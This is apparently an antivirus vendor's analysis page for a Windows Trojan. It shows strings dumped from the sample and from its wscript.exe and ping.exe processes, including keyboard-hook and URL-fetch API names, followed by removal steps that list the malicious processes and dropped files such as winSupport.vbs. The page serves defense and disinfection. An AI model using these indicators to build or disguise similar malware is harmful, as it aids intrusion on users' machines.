Font.Style
Picture.Data
WinExec
GetCPInfo
RegOpenKeyExW
RegCloseKey
RegUnLoadKeyW
RegSaveKeyW
RegRestoreKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
InternetOpenUrlW
.text
`.itext
`.data
.idata
.didata
.rdata
@.reloc
B.rsrc
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
%s[%d]
%s_%d
.Owner
ole32.dll
USER32.DLL
\\?\UNC\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
%s (*.%s)|*.%1:s
%s (%s)|%1:s|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
comctl32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
\wg.gif
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.&Cannot change the size of a JPEG image
JPEG error #%d
All Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
OK Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window class*Input buffer exceeded for %s = %d, %s = %d The specified file was not found$No help viewer that supports filters
Invalid Timeout value: %s#''%s'' is not a valid integer value#No context-sensitive help installed
No help found for %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

wscript.exe_472:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.
Missing job name.*Unicode is not supported on this platform.
<The Windows Script Host settings have been reset to default.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

ping.exe_1840:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
iphlpapi.dll
USER32.dll
WS2_32.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
ping.pdb
RegCloseKey
RegOpenKeyExA
TCP/IP Ping Command
5.1.2600.5512 (xpsp.080413-0852)
ping.exe
Windows
Operating System
5.1.2600.5512
Destination port unreachable.
Unable to initialize Windows Sockets interface, error code %1!d!.
%1 [%2] %0
%1 [%2] : %0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ping.exe:740
    ping.exe:1700
    ping.exe:372
    ping.exe:204
    ping.exe:596
    ping.exe:1772
    ping.exe:1724
    ping.exe:1156
    ping.exe:1308
    ping.exe:1844
    ping.exe:1252
    ping.exe:644
    ping.exe:1352
    ping.exe:824
    ping.exe:504
    ping.exe:1516
    ping.exe:500
    wscript.exe:472

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif (192769 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\wg.gif (193177 bytes)
    %Documents and Settings%\All Users\winSupport.vbs (21242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\nmscrp[1].gif (20929 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now